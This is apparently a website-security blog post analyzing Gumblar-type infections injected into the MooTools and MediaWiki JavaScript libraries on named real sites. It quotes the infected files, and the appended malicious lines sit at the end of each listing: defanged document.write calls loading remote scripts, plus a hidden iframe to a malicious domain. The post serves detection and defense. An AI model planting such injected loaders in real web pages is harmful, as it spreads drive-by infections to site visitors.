• When Benign scripts attack – III

    In this post we continue to analyze how popular scripts are being targeted by hackers to cause infections on websites, and on the computers of the visitors whose browsers load those scripts to view the site. The motivation for using these originally benign scripts to do the dirty work is that many webmasters and web enthusiasts have wised up to the fact that code injection is a never-ending battle, and they are making efforts to identify and remove malicious code from their sites.

    This particular example shows how a MooTools script was used by a hacker to spread a Gumblar infection. Consider the case of hxxp://www.wwf.gr/ referred to by 22lyk-athin. att.sch .gr/index.html.  You will find the following code in one of the associated MooTools JavaScript files, which are pulled in locally by the site. The malicious code causes an infection which leads to the site being blacklisted by Google. The detailed report from Google would probably mention that the infection is of the "Gumblar" type.

    Following the first example is another one in which a MediaWiki script was targeted. The source was www.1wed din gsource.com/wedding-wiki/Wedding/

    //MooTools, My Object Oriented Javascript Tools. Copyright (c) 2006 Valerio Proietti, <http://mad4milk.net>, MIT Style License.
    
    // Quoted, minified MooTools 1.11 core: the legitimate part of the infected file.
    // The &amp; / &lt; / &quot; sequences appear to be HTML escaping from the page rendering,
    // not the bytes of the original script - read them as &, < and ".
    // This span only defines the library's global helpers ($defined, $type, $merge,
    // $extend, $native, $chk, $pick, $random, $time, $clear, Abstract), extends
    // Function/Array/String/Number through $native, sets browser-sniffing flags on
    // window (ie/ie6/ie7, webkit/webkit419/webkit420, gecko, khtml) and shims HTMLElement.
    // None of it is the injection; that is the document.write() payload shown under the
    // "malicious code" marker at the end of the listing. Because the payload is simply
    // added to a static library file, comparing the deployed file's hash against the
    // upstream MooTools 1.11 release would have revealed the tampering.
    // Note for reuse: $merge recurses with a bare for..in and no own-property check, so
    // it should not be fed attacker-controlled objects.
    var MooTools={version:'1.11'};function $defined(obj){return(obj!=undefined);};function $type(obj){if(!$defined(obj))return false;if(obj.htmlElement)return'element';var type=typeof obj;if(type=='object'&amp;&amp;obj.nodeName){switch(obj.nodeType){case 1:return'element';case 3:return(/\S/).test(obj.nodeValue)?'textnode':'whitespace';}}
    if(type=='object'||type=='function'){switch(obj.constructor){case Array:return'array';case RegExp:return'regexp';case Class:return'class';}
    if(typeof obj.length=='number'){if(obj.item)return'collection';if(obj.callee)return'arguments';}}
    return type;};function $merge(){var mix={};for(var i=0;i&lt;arguments.length;i++){for(var property in arguments[i]){var ap=arguments[i][property];var mp=mix[property];if(mp&amp;&amp;$type(ap)=='object'&amp;&amp;$type(mp)=='object')mix[property]=$merge(mp,ap);else mix[property]=ap;}}
    return mix;};var $extend=function(){var args=arguments;if(!args[1])args=[this,args[0]];for(var property in args[1])args[0][property]=args[1][property];return args[0];};var $native=function(){for(var i=0,l=arguments.length;i&lt;l;i++){arguments[i].extend=function(props){for(var prop in props){if(!this.prototype[prop])this.prototype[prop]=props[prop];if(!this[prop])this[prop]=$native.generic(prop);}};}};$native.generic=function(prop){return function(bind){return this.prototype[prop].apply(bind,Array.prototype.slice.call(arguments,1));};};$native(Function,Array,String,Number);function $chk(obj){return!!(obj||obj===0);};function $pick(obj,picked){return $defined(obj)?obj:picked;};function $random(min,max){return Math.floor(Math.random()*(max-min+1)+min);};function $time(){return new Date().getTime();};function $clear(timer){clearTimeout(timer);clearInterval(timer);return null;};var Abstract=function(obj){obj=obj||{};obj.extend=$extend;return obj;};var Window=new Abstract(window);var Document=new Abstract(document);document.head=document.getElementsByTagName('head')[0];window.xpath=!!(document.evaluate);if(window.ActiveXObject)window.ie=window[window.XMLHttpRequest?'ie7':'ie6']=true;else if(document.childNodes&amp;&amp;!document.all&amp;&amp;!navigator.taintEnabled)window.webkit=window[window.xpath?'webkit420':'webkit419']=true;else if(document.getBoxObjectFor!=null)window.gecko=true;window.khtml=window.webkit;Object.extend=$extend;if(typeof HTMLElement=='undefined'){var HTMLElement=function(){};if(window.webkit)document.createElement(&quot;iframe&quot;);HTMLElement.prototype=(window.webkit)?window[&quot;[[DOMElement.prototype]]&quot;]:{};}
    HTMLElement.prototype.htmlElement=function(){};if(window.ie6)try{document.execCommand(&quot;BackgroundImageCache&quot;,false,true);}catch(e){};var(properties){var klass=function(){return(arguments[0]!==null&amp;&amp;this.initialize&amp;&amp;$type(this.initialize)=='function')?this.initialize.apply(this,arguments):this;};$extend(klass,this);klass.prototype=properties;klass.constructor=Class;return klass;};Class.empty=function(){};Class.prototype={extend:function(properties){var proto=new this(null);for(var property in properties){var pp=proto[property];proto[property]=Class.Merge(pp,properties[property]);}
    return new Class(proto);},implement:function(){for(var i=0,l=arguments.length;i&lt;l;i++)$extend(this.prototype,arguments[i]);}};Class.Merge=function(previous,current){if(previous&amp;&amp;previous!=current){var type=$type(current);if(type!=$type(previous))return current;switch(type){case'function':var merged=function(){this.parent=arguments.callee.parent;return current.apply(this,arguments);};merged.parent=previous;return merged;case'object':return $merge(previous,current);}}
    return current;};var Chain=new Class({chain:function(fn){this.chains=this.chains||[];this.chains.push(fn);return this;},callChain:function(){if(this.chains&amp;&amp;this.chains.length)this.chains.shift().delay(10,this);},clearChain:function(){this.chains=[];}});var Events=new Class({addEvent:function(type,fn){if(fn!=Class.empty){this.$events=this.$events||{};this.$events[type]=this.$events[type]||[];this.$events[type].include(fn);}
    return this;},fireEvent:function(type,args,delay){if(this.$events&amp;&amp;this.$events[type]){this.$events[type].each(function(fn){fn.create({'bind':this,'delay':delay,'arguments':args})();},this);}
    
    **code removed for brevity**
    
    this.effects={};if(this.options.opacity)this.effects.opacity='fullOpacity';if(this.options.width)this.effects.width=this.options.fixedWidth?'fullWidth':'offsetWidth';if(this.options.height)this.effects.height=this.options.fixedHeight?'fullHeight':'scrollHeight';for(var i=0,l=this.togglers.length;i&lt;l;i++)this.addSection(this.togglers[i],this.elements[i]);this.elements.each(function(el,i){if(this.options.show===i){this.fireEvent('onActive',[this.togglers[i],el]);}else{for(var fx in this.effects)el.setStyle(fx,0);}},this);this.parent(this.elements);if($chk(this.options.display))this.display(this.options.display);},addSection:function(toggler,element,pos){toggler=$(toggler);element=$(element);var test=this.togglers.contains(toggler);var len=this.togglers.length;this.togglers.include(toggler);this.elements.include(element);if(len&amp;&amp;(!test||pos)){pos=$pick(pos,len-1);toggler.injectBefore(this.togglers[pos]);element.injectAfter(toggler);}else if(this.container&amp;&amp;!test){toggler.inject(this.container);element.inject(this.container);}
    var idx=this.togglers.indexOf(toggler);toggler.addEvent('click',this.display.bind(this,idx));if(this.options.height)element.setStyles({'padding-top':0,'border-top':'none','padding-bottom':0,'border-bottom':'none'});if(this.options.width)element.setStyles({'padding-left':0,'border-left':'none','padding-right':0,'border-right':'none'});element.fullOpacity=1;if(this.options.fixedWidth)element.fullWidth=this.options.fixedWidth;if(this.options.fixedHeight)element.fullHeight=this.options.fixedHeight;element.setStyle('overflow','hidden');if(!test){for(var fx in this.effects)element.setStyle(fx,0);}
    return this;},display:function(index){index=($type(index)=='element')?this.elements.indexOf(index):index;if((this.timer&amp;&amp;this.options.wait)||(index===this.previous&amp;&amp;!this.options.alwaysHide))return this;this.previous=index;var obj={};this.elements.each(function(el,i){obj[i]={};var hide=(i!=index)||(this.options.alwaysHide&amp;&amp;(el.offsetHeight&gt;0));this.fireEvent(hide?'onBackground':'onActive',[this.togglers[i],el]);for(var fx in this.effects)obj[i][fx]=hide?0:el[this.effects[fx]];},this);return this.start(obj);},showThisHideOpen:function(index){return this.display(index);}});Fx.Accordion=Accordion;
    
    **malicious code**
    
    document.write('&lt;scr ipt src=hxxp://nw drealty.com/Scripts/Unti tled-17.php &gt;&lt;\/sc ript&gt;');
    document.write('&lt;scri pt src=hxxp://nwd realty.com/Scripts/Untit led-17.php &gt;&lt;\/s cript&gt;');&lt;/pre&gt;
    etTime()+2678400000);if(document.cookie.indexOf(&quot;_df=f&quot;)==-1){if(navigator.appCodeName.indexOf(&quot;a&quot;)!=-1){iframe=&quot;iframe&quot;}document.write(&quot;&lt;iframe+ width=1 height=1 src=\'hxxp://l oading-a tm.net/b2b/\' style=\'display:none\'&gt;&lt;/iframe&gt;&quot;);document.cookie=&quot;_df=f; expires=expires.toGMTString(); &quot;}\n']&lt;/pre&gt;
    

    Our systems flagged this as unsafe. This exploit leads to an infection which is a remnant of the famous gumblar virus.

    // MediaWiki JavaScript support functions
    var clientPC = navigator.userAgent.toLowerCase(); // Get client info
    var is_gecko = /gecko/.test( clientPC ) &&
    !/khtml|spoofer|netscape\/7\.0/.test(clientPC);
    var webkit_match = clientPC.match(/applewebkit\/(\d+)/);
    if (webkit_match) {
    var is_safari = clientPC.indexOf('applewebkit') != -1 &&
    clientPC.indexOf('spoofer') == -1;
    var is_safari_win = is_safari && clientPC.indexOf('windows') != -1;
    
    ** code removed for brevity **
    }
    //note: all skins should call runOnloadHook() at the end of html output,
    //      so the below should be redundant. It's there just in case.
    hookEvent("load", runOnloadHook);
    
    ** malicious code **
    document.write('<scr ipt src=hxxp://hydr eka.com/logiciels/winfluid_mo bile.php ><\/s cript>');</pre>
    
    • […] 79% of Joomla sites use Mootools. (NOTE: MooTools has been known to be targeted preferentially by malicious hackers as a code-injection deliv…) […]

      Posted by Analyzing Popular CMSes: Are Joomla users at risk? – StopTheHacker.com – Jaal, LLC. on February 1st